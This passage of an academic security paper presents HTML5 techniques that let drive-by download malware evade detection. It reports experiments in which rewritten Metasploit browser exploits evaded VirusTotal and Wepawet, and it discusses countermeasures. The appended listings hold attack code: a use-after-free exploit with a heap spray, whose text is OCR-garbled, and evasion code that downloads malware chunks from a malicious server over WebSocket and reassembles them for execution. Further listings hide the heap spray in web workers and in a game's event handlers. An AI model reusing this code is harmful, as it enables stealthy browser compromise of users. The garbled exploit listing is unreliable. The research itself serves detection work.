recognize the activity performed by a single worker as part of a more complex
distributed algorithm performed by all the involved workers. Firstly, the
analysis of the code executed by a single web worker would not reveal any
damaging activity. Secondly, it would be hard for a detection system to guess
the correct order in which code is executed among different web workers
without executing it.

Countermeasures Countering an attack carried out using the distributed
technique is likely to be harder than in the case of the delegated technique.
As in the previous case, a rough solution would be to deny altogether the
possibility of running dynamic code assembled using data coming from an
untrusted source (in this case, a message received from another worker). If
this solution is not viable, it is again possible to resort to taint analysis
techniques for detecting malicious code by tracing the usage of data coming
from untrusted sources. However, the problem here is complicated by the
distributed nature of the application being run. Several solutions have been
proposed to this end in the recent literature, such as in [15, 36]. The
rationale of these approaches is to introduce a framework able to generalize
and aggregate the behavior of the single threads of a distributed application,
so as to better trace the path followed to perform a malicious activity. These
frameworks are able to trace both the activities of the single threads and the
pieces of data exchanged among different threads. There remains, however, one
important handicap. Since the communication pattern followed by the workers is
not necessarily known a priori, but may be influenced by the execution flow of
the application, the taint analysis should be performed dynamically (i.e., by
monitoring the execution of the distributed application in a setting where the
malicious activity takes place), thus ruling out static and semi-static
detection systems.
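
To make the idea of aggregating per-thread behavior more concrete, the sketch
below records, at runtime, which workers contributed to each piece of data.
It is a toy model under our own assumptions and does not reproduce the
frameworks of [15, 36]: the MessageMonitor class and its produce(), send() and
contributors() methods are hypothetical, and the workers are simulated by
plain function calls rather than by real threads.

```javascript
class MessageMonitor {
  constructor() {
    this.provenance = new Map(); // data id -> Set of contributing workers
    this.log = [];               // observed messages, in arrival order
  }

  // `worker` creates data item `id` out of previously received items.
  produce(worker, id, inputIds = []) {
    const origin = new Set([worker]);
    for (const input of inputIds) {
      for (const w of this.provenance.get(input) || []) origin.add(w);
    }
    this.provenance.set(id, origin);
  }

  // Every message is logged as it happens; the route is not known a priori.
  send(from, to, id) {
    this.log.push({ from, to, id });
  }

  // Workers whose output flowed, directly or indirectly, into item `id`.
  contributors(id) {
    return [...(this.provenance.get(id) || [])].sort();
  }
}

const monitor = new MessageMonitor();
monitor.produce('ww1', 'a');
monitor.produce('ww2', 'b');
monitor.send('ww1', 'ww3', 'a');
monitor.send('ww2', 'ww3', 'b');
monitor.produce('ww3', 'c', ['a', 'b']);
console.log(monitor.contributors('c')); // [ 'ww1', 'ww2', 'ww3' ]
```

Because the provenance sets are built from observed messages only, such a
monitor has to run alongside the application, which is consistent with the
remark that static and semi-static systems are ruled out.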

5.3 User-driven Preparation 

The user-driven technique is a variant of the distributed preparation
technique. Here, the activities related to the preparation and to the
execution of a malware are spread across the time that a victim user spends
visiting a single page or a collection of pages (i.e., seconds or minutes)
rather than being concentrated in a few milliseconds. Moreover, in order to
avoid the predictability of the sequence, the execution of the single
activities is not automatic but is triggered by the (unaware) user. Such an
approach falls into the category of Logic Bombs ([13]).

From a technical point of view, this technique can be implemented by binding
the execution of malware activities to the occurrence of some user-triggered
events (e.g., the user clicks on a button contained in the web page). A
similar approach has been leveraged in the wild by the Nuclear Pack exploit
kit (see [24]), whose malicious activity is triggered at the occurrence of an
onmousemove event. The user-driven preparation technique is based on a more
articulated idea. The content of the page is organized in such a way that the
victim has to perform an exact sequence of steps in order to enjoy the content
of the page (e.g., playing a game). By following this sequence, the victim
unintentionally drives the execution of the malware.

A possible refinement of this technique would be to scatter the
malware-related activities across several web pages while using the browser
local storage to save temporary data.

Comment We expect this technique to be able to escape static and semi-static
detection systems because the harmful code is scattered across several parts
of the page and its execution is triggered by external non-deterministic
events. Moreover, this technique could also be effective against detection
systems based on honeyclients, as the exact sequence of steps that causes an
attack to take place is strongly related to the way a human user would
interact with the page. With respect to previous attempts at avoiding
honeyclient analysis, such an approach is much more effective, since it would
be very complicated for an automatic program to replicate the exact actions
leading to the triggering of the attack.

Countermeasures The user-driven technique falls in the more general category
of trigger-based behaviors in malware, i.e., hidden behaviors in a code that
are activated only when properly triggered. Similarly to what has been said
for the previous techniques, the easiest (and most drastic) way to counter
attacks based on the user-driven technique would be to deny the possibility of
running code whose content has been influenced by the user's input. When such
a policy is not viable, it is possible to resort to some of the solutions
existing in the literature for this class of problems. Namely, detection
systems such as the ones described in [5, 14] are able to detect,
automatically or semi-automatically, the existence of a trigger-based behavior
in a code, find the conditions that trigger such hidden behavior and, finally,
find inputs that are able to satisfy these conditions. The approach being used
takes advantage of a mix of analysis techniques and may require a deep
instrumentation or a reference execution of the code being analyzed. In our
case, it is not clear whether the time required by these systems to complete a
scan of a malicious code that implements the user-driven technique would be
acceptable.
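
The cost concern can be illustrated with a naive search for triggering
inputs: enumerate every sequence of user events up to a given length and
replay each one against a fresh copy of the page. This brute-force sketch is
our own simplification and is far cruder than the systems of [5, 14]; the
function findTriggeringSequences and the toy page model makeToyPage are
hypothetical.

```javascript
// `makePage` returns a fresh page model:
//   { handlers: { eventName: fn, ... }, sinkReached: () => boolean }
function findTriggeringSequences(makePage, maxDepth) {
  const eventNames = Object.keys(makePage().handlers);
  const found = [];
  let explored = 0;

  const visit = (sequence) => {
    if (sequence.length > 0) {
      explored++;
      const page = makePage(); // replay from a clean state
      for (const name of sequence) page.handlers[name]();
      if (page.sinkReached()) {
        found.push(sequence);
        return; // no need to extend a sequence that already triggers
      }
    }
    if (sequence.length === maxDepth) return;
    for (const name of eventNames) visit([...sequence, name]);
  };

  visit([]);
  return { found, explored };
}

// Toy model: the hidden behavior fires only after two key presses
// followed by a score update.
function makeToyPage() {
  let keys = 0;
  let fired = false;
  return {
    handlers: {
      keydown: () => { keys++; },
      score: () => { if (keys >= 2) fired = true; },
    },
    sinkReached: () => fired,
  };
}

console.log(findTriggeringSequences(makeToyPage, 3));
```

With two event types and sequences of length at most three, 14 replays are
already needed to find the single triggering sequence; the number of
candidates grows exponentially with the length of the sequence, which is why
scan time is a concern for triggers hidden behind long interactions.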

6 Implementation and Experiments 

In the remaining part of this work we present the results of an
experimentation aimed at assessing the effectiveness of the proposed
techniques¹. In these experiments we reproduced a series of real-world
scenarios, where a victim client visits a malicious website which tries to
execute one or more JavaScript-based malware. Such malware is obfuscated by
means of the patterns discussed in Section 5. The experimentation consisted of
the following steps:

1. Selection of a reference set of JavaScript-based attacks publicly available
   on the web (base malware);

2. Analysis of the selected malware by means of a number of malware detection
   systems;

3. Obfuscation of the attacks by means of the techniques presented in this
   work (obfuscated malware);

4. Re-analysis of the obfuscated malware.

¹ A copy of the code used in our experimentation is publicly available at the
following URL: www.statistica.uniroma1.it/users/uferraro/experim/malware.

Table 1: List of malware used in our experimentations

Malware sample   Target browser              Vulnerability    Public PoC exploit
A                Firefox 8, 9                CVE-2011-3659    [30]
B                Internet Explorer 6         CVE-2010-0249    [34]
C                Firefox 3.5                 CVE-2009-2478    [1]
D                Internet Explorer 6, 7, 8   CVE-2010-3962    [25]


The objective of the experiments is to show that the web pages containing the
malware rewritten using our techniques appear perfectly clean upon
re-analysis. The malware reference set includes some proof-of-concept attacks
published on the web, some of which are summarized in Table 1. As already
highlighted in Section 2, for the sake of simplicity but without loss of
generality, the sample malware used for the experiments is not real-world
malware. In fact, it just implements the execution phase and uses a
proof-of-concept payload. All the sample code has been generated by means of
publicly available modules of the Metasploit framework, as summarized in
Table 1. Some of the selected malware is intentionally dated, and hence
currently detected by most of the (static and dynamic) malware detection tools
selected at step 2. Clearly, the detection rate at the last step cannot
increase if novel attacks (i.e., 0-days) are used as base malware. All the
malware samples have been configured to simply execute the Calculator program
as a result of the attack, but clearly the same results can be obtained by
adopting more complex payloads.

Although many malware analysis techniques and tools have been proposed in the
literature (see Section 3), only a very limited subset of them is publicly
available for use. The malware detection systems used to validate our methods
are VirusTotal ([40]) and Wepawet ([49]). The first is a free online service
that analyzes files and URLs to identify various kinds of malware. VirusTotal
aggregates the output of different antivirus engines, website scanners and
other file and URL analysis tools. This service allowed for fast testing with
more than 40 malware analyzers. VirusTotal uses not only state-of-the-art
commercial antivirus engines, based on signature analysis, but also
reputation-based engines, IPS engines, browser protection engines,
buffer-overflow engines, behavioral engines and other heuristic engines².
Wepawet is a platform for dynamic off-line analysis of web-based threats which
combines a number of approaches and techniques to analyze code executed by a
web page. The core of the system is the JSAND module, which is one of the most
advanced low-interaction honeyclients documented in the literature. It is able
to emulate several environment configurations in order to explore all the
potentially harmful code paths. Dynamic analysis is implemented by means of
anomaly detection techniques able to discern between benign and malicious code
execution. Since the implementation of these analysis tools is constantly
evolving, it is important to highlight that all the experiments have been
conducted between February and April 2013.

6.1 Testing Environment 

The obfuscated malware samples have been embedded in a set of web pages 
and uploaded onto a local web server running Apache 2.2.16 on Linux Debian 
6.0. The server machine used for the experiments has been a laptop with an 
Intel Core i3-370M and 4 GB of RAM. The vulnerable client machine has been a 
laptop with Intel Pentium Processor P6100 and 2 GB of RAM, running Windows 
XP SP2 as operating system. 

The attacks used in the experimentation target different browser
configurations under Windows XP, as summarized in Table 1. It is worth noting
that some of these browsers, like Internet Explorer, do not provide support
for the HTML5 APIs employed by our techniques, which means that some of the
attacks cannot actually be executed against the target environment. This
should not be considered a weakness of the method, since detection based on
static code analysis does not require the malware to be executed. On the other
hand, browsers with HTML5 support, like Firefox 8 and 9, have been
successfully exploited by means of the modified malware, which means that our
obfuscation techniques are able to preserve the timeliness, the order and the
correctness of all the low-level instructions required to accomplish the
attack. Dated hardware was deliberately used for both the server and the
client machines to show that no particular resources are required to execute
our HTML5-based techniques.

² A comprehensive list of the products used by VirusTotal can be found here:
https://www.virustotal.com/en/about/credits/

6.2 Experiment 1: Evasion Through Delegated Preparation

The delegated preparation technique assumes that portions of malware, referred
to as malware chunks, are stored on a malicious server and can be retrieved,
for example, by means of the WebSocket protocol. A malware chunk may be a
single instruction, a set of instructions, a piece of hex-encoded payload, a
pre-computed value and so on. In the example presented below, the malicious
web page uses the HTML5 WebSocket API in order to establish a TCP connection
with the server. The server sends back to the malicious web page a series of
malware chunks that are processed differently depending on the specific
storage API.

Listing 4 shows a basic implementation of the delegated preparation technique
(for the sake of clarity some details have been omitted and self-explanatory
variable names have been chosen). It is assumed that each malware chunk is a
single instruction of the original malware. First, a connection with the
malicious server is opened (line 2). On the reception of a message (line 3),
the received chunk is stored in a local database (line 7). Once the connection
is closed by the server (line 11), the full code is reassembled by means of a
single call to the GROUP_CONCAT() function of SQLite (line 14), which
transparently returns the concatenation of all the stored values.

As shown in the previous example, the use of the WebSQL API makes it possible
to assemble the malware in a transparent way, thus completely avoiding any
string manipulation. Currently, the WebSQL API specification is supported by
WebKit-based browsers, such as Google Chrome, Apple Safari and Opera. In case
the target browser does not support the Web SQL API (e.g., Mozilla Firefox),
Web Storage ([44]) or Indexed DB ([43]) could be leveraged instead. Listing 5
shows a possible implementation of the previous attack using the Indexed DB
API. As in the previous case, on the reception of a message the chunk is
stored in the local database (line 11). When the connection is closed by the
server, a cursor is used in order to step through all the values in the object
store (line 17). The onsuccess() callback (line 19) is called for each chunk
in the object store, which can be processed as a consequence (e.g., passed to
eval()). Also in this case, no string manipulation is performed.

Another HTML5 API that can be used for the delegated preparation is Blob, or
BlobBuilder in older browser versions. Both APIs can be leveraged to
transparently concatenate a series of strings without using any suspicious
string manipulation functions. An example is shown in Listing 6, where a
BlobBuilder object is used to reassemble a hex-encoded payload obtained by
means of a WebSocket connection. In more detail, the chunks returned by the
server are progressively appended to a BlobBuilder object (line 12). When the
server closes the connection, the complete blob is reassembled by means of the
getBlob() function (line 17). The content of the blob is subsequently read and
merged into a single string by means of the FileReader API (line 24). Finally,
the resulting payload is processed (line 19). Even in this case no string
manipulation functions have been used.

6.3 Experiment 2: Evasion Through Distributed Preparation

The basic idea of this technique is to obfuscate the malicious code by
delegating the execution of different parts of the same malware to different
dedicated threads. This can be accomplished by leveraging the Web Worker API
supported by most recent browsers. A graphical representation of the example
presented in this section is given by the tree diagram in Figure 1. The web
workers are represented by nodes and the dependencies among web workers are
represented by edges. In more detail, two web workers ww1 and ww2 are used to
retrieve the payload. They do not depend on each other, and can therefore be
executed concurrently (same level). After their termination, ww3 is activated
in order to perform the heap spray (see Section 2). Clearly, this step depends
on the output of ww1 and ww2. As a consequence, ww3 can only start once the
execution of its children has terminated. The memory corruption data is
generated by ww4, which finally triggers the exploit. Synchronization among
web workers can be managed by means of JavaScript events. It is worth noting
that the malware execution path could be more complex than that presented in
Figure 1 and can be generalized to a graph.
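
From an analyst's point of view, once such a dependency graph has been
recovered, the admissible execution order can be computed level by level with
a standard topological sort. The sketch below is generic graph code written
for this purpose; the function name executionLevels is hypothetical, and the
edge from ww3 to ww4 is our assumption based on the description above (ww4
runs after the heap spray), since Figure 1 is not reproduced here.

```javascript
// `deps` maps each node to the list of nodes it must wait for.
// Returns an array of levels; nodes in the same level are independent.
function executionLevels(deps) {
  const remaining = new Map(
    Object.entries(deps).map(([node, d]) => [node, new Set(d)]));
  const levels = [];
  while (remaining.size > 0) {
    const ready = [...remaining.keys()]
      .filter((node) => remaining.get(node).size === 0)
      .sort();
    if (ready.length === 0) throw new Error('cyclic dependency');
    for (const node of ready) remaining.delete(node);
    for (const pending of remaining.values()) {
      for (const node of ready) pending.delete(node);
    }
    levels.push(ready);
  }
  return levels;
}

const levels = executionLevels({
  ww1: [],
  ww2: [],
  ww3: ['ww1', 'ww2'],
  ww4: ['ww3'], // assumed ordering, see the note above
});
console.log(levels); // [ [ 'ww1', 'ww2' ], [ 'ww3' ], [ 'ww4' ] ]
```

The same routine applies unchanged when the execution path is a general
directed acyclic graph rather than a tree.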

A basic implementation of this example is presented in Listing 7. The attack
discussed in Section 2 is used as base malware. At runtime, the malicious page
instantiates two web workers (ww1 at line 4 and ww2 at line 12), each
responsible for delivering a piece of the payload. They are executed
concurrently since their tasks are independent of each other. When a web
worker terminates its work, the generated data is extracted from the received
message (line 5 and line 13) and its termination is signaled by means of a
Terminated event. The execution of ww3 is triggered once all the required
parameters have been obtained (line 20). The third web worker is responsible
for executing the heap spray. Afterwards, the code aimed at triggering the
exploit is executed (line 27). The exploit data is generated by means of a
last web worker (line 31), ww4, which returns the series of blocks used to
overwrite the memory referenced by the dangling pointer (line 36). Finally,
the memory error is triggered (line 40).

Figure 1: Distributed preparation: malware execution path.

The concurrent preparation technique can be adopted recursively by leveraging
nested web workers (currently supported only by Firefox). Listing 8 shows a
possible implementation of ww3 based on nested web workers. The procedure is
divided into three phases, each performed by a dedicated web worker. In
particular, ww3a is in charge of generating the padding data, which is in turn
passed to ww3b together with the payload (line 8). At this point, ww3b can use
these parameters in order to assemble the spray block. The last step is
performed by ww3c (line 15), which generates a random variable containing the
spray data. Once the spray is complete, the termination is signaled to the
main thread (line 25). Although ww3a, ww3b and ww3c must be executed in
sequence, since each depends on the previous one, multiple instances of ww3
can be executed in parallel in order to speed up the procedure.

6.4 Experiment 3: Evasion Through User-driven Preparation

The user-driven technique is based on the idea that the execution of a malware
can be tied to the interaction of the user with a web page. Any web-based
attack can be straightforwardly adapted to this pattern. Technically, the
execution of a specific block of instructions is associated with the
occurrence of a particular event triggered by the user. Only one (or a small
subset) of all the possible sequences of actions available to the user leads
to the full execution of the malware. The effectiveness of this attack relies
on the fact that it leverages not only technical tricks but also human
factors, which are difficult to reproduce by means of an automated program
like a client honeypot. While this approach is not strictly related to HTML5,
this technology introduces many functionalities which can be leveraged to
realize the user-driven technique.

Clearly, a difficulty of this technique consists in inducing the victim to
perform the exact sequence of actions leading to the execution of the malware.
The example discussed below shows how a common browser game can be adapted to
this purpose. In particular, it makes use of a simple version of the famous
Snake game (available at [33]), which is implemented by means of the Canvas
API [46]. The canvas is used to draw the plane in which the snake moves, and
the direction of the snake can be changed by the user through the direction
keys. The canvas is refreshed at regular time intervals (ticks). The example
leverages two functions defined in the original source code: changeDirection()
and updateScore(). The first is in charge of updating the direction of the
snake and is called whenever a keystroke occurs. The second function is called
whenever the snake catches some food in order to update the user's score.
Thus, by playing the game, the unaware user drives the correct execution of
the malware.

As shown in Listing 9, a hook has been inserted at the beginning of the
changeDirection() function, which performs a call to the spray_step()
procedure. This performs a single step of the heap spray. It is worth noting
that this procedure can be obfuscated, in turn, by means of the delegated
preparation or the concurrent preparation. The heap spray remains quite
effective, since it is completed within a short time: a new handler for the
keydown event is registered at each tick without removing the previous
handlers (this is an imperfection of the original code), which results in
multiple calls of the changeDirection() function whenever a key is pressed.
When the heap spray is done, a global flag bonus is set.

A hook has been inserted at the end of the updateScore() function, which is in
charge of triggering the vulnerability. It is worth noting that the bonus and
the score parameters are checked before performing the call to the run()
function. In this way, the malware execution proceeds only if (1) the heap
spray has been completed successfully and (2) the user's score is above a
certain threshold. This last requirement is meant to ensure that the player is
really a human.

6.5 Analysis and Reports 

A victim machine has been set up in order to carry out the validation
procedure. In a first phase, we prepared a set of web pages, each containing
one of the chosen malware codes, then we verified that the selected malware
detection systems correctly classified such pages as malicious. In a second
phase, we used the same detection systems to surf the web pages containing the
malware rewritten using the novel obfuscation techniques. For each malware, we
wrote five different variants based on the three techniques documented in
Section 5. As discussed before, the tests have been carried out by using
VirusTotal, for on-line static and dynamic analysis, and Wepawet, for off-line
dynamic analysis. In case of multiple resources constituting the malware, each
file has been sent separately to VirusTotal for analysis. In the case of
Wepawet, only the URL of the main page has been submitted. Since the
implementation of the systems used for the analysis is continuously evolving,
which influences their effectiveness in detecting new malware, it is important
to highlight that all the experiments have been conducted between February and
April 2013.

Table 2: VirusTotal detection ratio on the sample malware set

Malware    Detection ratio
A          11/46
B          31/46
C          30/46
D          28/46


Table 2 summarizes the detection ratio given by VirusTotal in the first phase
for each sample malware in Table 1, while Table 3 summarizes the results of
the analysis performed by Wepawet on the same malware set. As can be clearly
seen, VirusTotal, which, we recall, makes use of 46 different (mostly static)
detection systems, and Wepawet were always able to correctly identify the
analyzed code as malicious. It is worth recalling that the malware samples
were equipped with simple proof-of-concept payloads (such as the execution of
the calc.exe program). Clearly, the use of more complex payloads can only
increase the detection rate of static analyzers. Conversely, the effectiveness
of the obfuscation techniques presented in this work does not depend on the
complexity/length of the original malware.
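
For readers who prefer percentages, the ratios of Table 2 can be converted
with a few lines of code. The values are those reported in Table 2; the
variable and function names are ours.

```javascript
// Number of VirusTotal engines flagging each base sample (from Table 2).
const detections = { A: 11, B: 31, C: 30, D: 28 };
const ENGINES = 46;

// Convert raw counts into percentages with one decimal digit.
function detectionRates(counts, total) {
  const rates = {};
  for (const [sample, hits] of Object.entries(counts)) {
    rates[sample] = ((hits / total) * 100).toFixed(1) + '%';
  }
  return rates;
}

console.log(detectionRates(detections, ENGINES));
// { A: '23.9%', B: '67.4%', C: '65.2%', D: '60.9%' }
```

In other words, each base sample was flagged by at least one engine, but by
no means by all of them: sample A was reported by fewer than a quarter of the
engines.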

Table 3: Wepawet results on the sample malware set

Malware    Classification result
A          malign
B          malign
C          malign
D          malign

We now turn our attention to the second phase of the experimentation. Here,
all the malware codes rewritten using our techniques have always been able to
evade detection when analyzed with either VirusTotal or Wepawet, although for
different reasons. As expected, VirusTotal was able to classify as malicious
only codes where a significant part of the original malware, like entire
shellcodes or exploit patterns, was in the same place. This seems to be mainly
due to the limitations of the static approach employed by most of the
detection systems used by VirusTotal, as a page is classified as malicious if
it matches, within a certain threshold, a previously known signature. Even the
sandbox-based products used by VirusTotal were not able to detect the threat,
most likely due to the limitations of the high-interaction honeyclients
discussed in Section 3. Such a problem should not affect Wepawet, as it
employs a completely dynamic approach based on emulation to establish whether
a code contains a malware. Despite this, Wepawet always failed to classify our
code as malicious. A careful analysis revealed that this behavior was probably
due to the module used by Wepawet to emulate the execution of JavaScript code,
which is apparently not able to interpret the HTML5 APIs leveraged by our
obfuscation patterns. As a consequence, Wepawet did not uncover the modified
attacks unless a significant part of the malware code (e.g., the exploit) was
in the main web page.
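
The effect of a missing API in an emulated environment can be reproduced with
a toy example. We do not know how the Wepawet emulator is built, so the sketch
below is only an analogy: it uses the Node.js vm module as a stand-in for an
emulator, and the emulate() function and its recording WebSocket stub are
hypothetical. No network traffic is generated.

```javascript
const vm = require('vm');

// Run `source` in a fresh context and report which monitored APIs it used.
function emulate(source, withHtml5Stubs) {
  const calls = [];
  const sandbox = {};
  if (withHtml5Stubs) {
    // Recording stub: it only logs the requested URL.
    sandbox.WebSocket = function (url) {
      calls.push('WebSocket:' + url);
    };
  }
  try {
    vm.runInNewContext(source, sandbox);
    return { completed: true, calls };
  } catch (err) {
    // Without the stub the script aborts before doing anything observable.
    return { completed: false, calls, error: err.name };
  }
}

const page = 'var ws = new WebSocket("ws://example.invalid/ws");' +
             'ws.onmessage = function () {};';
console.log(emulate(page, false)); // aborts with a ReferenceError
console.log(emulate(page, true));  // completes and records the connection
```

When the stub is absent, the analysis stops at the first unknown identifier
and observes no behavior at all, which is compatible with the explanation
given above for the missed detections.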

7 Conclusions 

In this article we presented three obfuscation techniques that leverage some
functionalities of the HTML5-related standards. These techniques can be used
to write drive-by download malware able to evade both static and dynamic
detection systems. We have experimentally assessed the effectiveness of our
techniques by using them to rewrite a reference set of web malware and by
analyzing the result. Our results show that, as far as the detection systems
publicly available today are concerned, our techniques seem to succeed in
preventing the detection of the malware.

This result was expected for static detection systems. The approach used by
these systems to identify malicious code is typically based on matching an
input code against a database of malware patterns (signatures). Since the
patterns we experimented with are still unknown to the existing static
detection systems, they went undetected. We obtained the same results even
when experimenting with semi-static detection systems. These systems implement
a blended approach by mixing the signature-based technique with more advanced
techniques, like heuristics and statistical features, to distinguish between
benign and malicious code. Despite this, the semi-static detection systems
employed in our experiments were unable to detect the tested malware. Finally,
the obfuscation techniques we experimented with were also able to deceive, in
our tests, dynamic detection systems. This may be surprising, as these systems
are able to detect a malware not by its code but according to its behavior. A
further investigation revealed that this failure was due to the inability of
these systems to recognize and deal with HTML5-related primitives. Thus, a
first countermeasure would be to update existing dynamic detection systems
with support for HTML5-related primitives. This would make it possible to
determine whether the dynamic approach is able to correctly detect malware
obfuscated with our techniques. We also provided several hints about the other
countermeasures that could be put into practice in order to counter our
techniques. As a more general consideration, as new web-related technologies
increase the range of possibilities for web applications, there is an urgent
need to harden the standard level of security of web browsers as well as to
increase public awareness of the potential dangers of running untrusted web
applications.

Listing 3: Exploitation of the vulnerability


<script type="text/javascript"> 

var ATTR = document.ereateAttribute (" FOD ") ; 

ATTR.value = "BAR"; 

var ITER = document.createNodelterator( 

ATTR, NodeFilter.SH0W_ALL , 

{acceptNode: function(node) { return NodeFilter.FILTER_ACCEPT; 
}}. 
false 

) ; 

ITER.nextNode () ; 

ITER.nextNode(); 

ITER.previousNodeO ; 

ATTR.value = null; 

const JUNK = unescape ( "7ou414iyou4141 ") ; 
var CONTAINER = new Array (); 

var OBJ = une s cape ( " youOcOc youOcOc youOcOc youOcOc you548e VouTS 19 VonOc 10 7, 
uOcOc") 

while (OBJ.length != 30) 

OBJ += JUNK; 

for (i = 0; i < 1024*1024*2; ++i) 

CONTAINER.push(unescape(OBJ)); 

ITER.referenceNode; 

</script>

Listing 4: Evasion through delegated preparation (WebSQL API)

var ws = new WebSocket("ws://" + server + ":" + port + "/ws");

// Store each received chunk as a separate record.
ws.onmessage = function (evt)
{
    db.transaction(function (tx) {
        tx.executeSql('INSERT INTO Cache (id, chunk) VALUES (?, ?)',
            [evt.data.id, evt.data.chunk]);
    });
};

// When the server closes the connection, let SQLite concatenate the records.
ws.onclose = function ()
{
    db.transaction(function (tx) {
        tx.executeSql('SELECT GROUP_CONCAT(chunk, "") AS full ' +
            'FROM Cache', [], function (tx, results)
        {
            malicious_code = results.rows.item(0).full;
        }, null);
    });
};
Listing 5: Evasion through delegated preparation (IndexedDB API) 


var ws = new WebSocket("ws://" + server + ":" + port + "/ws");
ws.onmessage = function (evt)
{
    var row = {
        "chunk": evt.data.chunk,
        "id": evt.data.id
    };
    var request = objectStore.add(row);
};
ws.onclose = function ()
{
    var cursorRequest = objectStore.openCursor();
    cursorRequest.onsuccess = function (e)
    {
        var result = e.target.result;
        if (!!result == false)
            return;
        process(result.value.chunk);
        result.continue();
    };
};
Listing 6: Evasion through delegated preparation (BlobBuilder API) 


function init()
{
    var bb = new BlobBuilder();
    var ws = new WebSocket("ws://" + server + ":" + port + "/ws");
    ws.onopen = function () {
        ws.send("Hello!");
    };
    ws.onmessage = function (evt) {
        bb.append(evt.data);
    };
    ws.onclose = function (evt)
    {
        var blob = bb.getBlob();
        var fr = new FileReader();
        fr.onload = function (e) {
            PAYLOAD = e.target.result;
            process(PAYLOAD);
        };
        fr.readAsText(blob);
    };
}
Listing 7: Distributed preparation: main web page 


var TERMEVT = document.createEvent("Event");
TERMEVT.initEvent("Terminated", true, true);
var ww1 = new Worker("ww1.js");
ww1.onmessage = function (evt)
{
    ROP = evt.data.rop;
    document.dispatchEvent(TERMEVT);
};
ww1.postMessage({});
var ww2 = new Worker("ww2.js");
ww2.onmessage = function (evt)
{
    PAYLOAD = evt.data.payload;
    document.dispatchEvent(TERMEVT);
};
ww2.postMessage({});
document.addEventListener("Terminated", function (evt)
{
    if (!!PAYLOAD)
        ww3.postMessage({'payload': PAYLOAD});
}, false);
var ww3 = new Worker("ww3.js");
ww3.onmessage = function (evt)
{ ...
    ATTR.value = null;
    var CONTAINER = new Array();
    var ww4 = new Worker("ww4.js");
    ww4.onmessage = function (evt)
    {
        if (!!evt.data.mem)
        {
            CONTAINER.push(evt.data.mem);
        }
        else
            ITER.referenceNode;
    };
};
Listing 8: Distributed preparation through nested web workers: Heap Spray 


onmessage = function (evt)
{
    var ww3a = new Worker("ww3a.js");
    ww3a.onmessage = function (evt)
    {
        var PADDING = evt.data.padding;
        ww3b.postMessage({ 'payload': PAYLOAD, 'padding': PADDING });
    };
    var ww3b = new Worker("ww3b.js");
    ww3b.onmessage = function (evt)
    {
        var SPRAYBLOCK = evt.data.sprayblock;
        ww3c.postMessage({ 'sprayblock': SPRAYBLOCK });
    };
    var ww3c = new Worker("ww3c.js");
    ww3c.onmessage = function (evt)
    {
        var CONTINUE = evt.data.continue;
        if (!!CONTINUE)
            ww3a.postMessage({});
        else
            postMessage({});
    };
};
Listing 9: Evasion through User-driven Preparation 


function changeDirection( e ) {
    spray_step();
    for ( i = 0; i < keys.length; i++ ) {
        if ( e.which == keys[i][0] || e.which == keys[i][1] ) {
            e.preventDefault();
        }
    }
}


Listing 10: Evasion through User-driven Preparation 


function updateScore() {
    score += scoreIncrement;
    $( '.score' ).html( score );
    if ( score > highScore ) {
        highScore = score;
        $( '.high-score' ).html( highScore );
    }
    if ( bonus == 1 && score >= 10 )
        run();
}











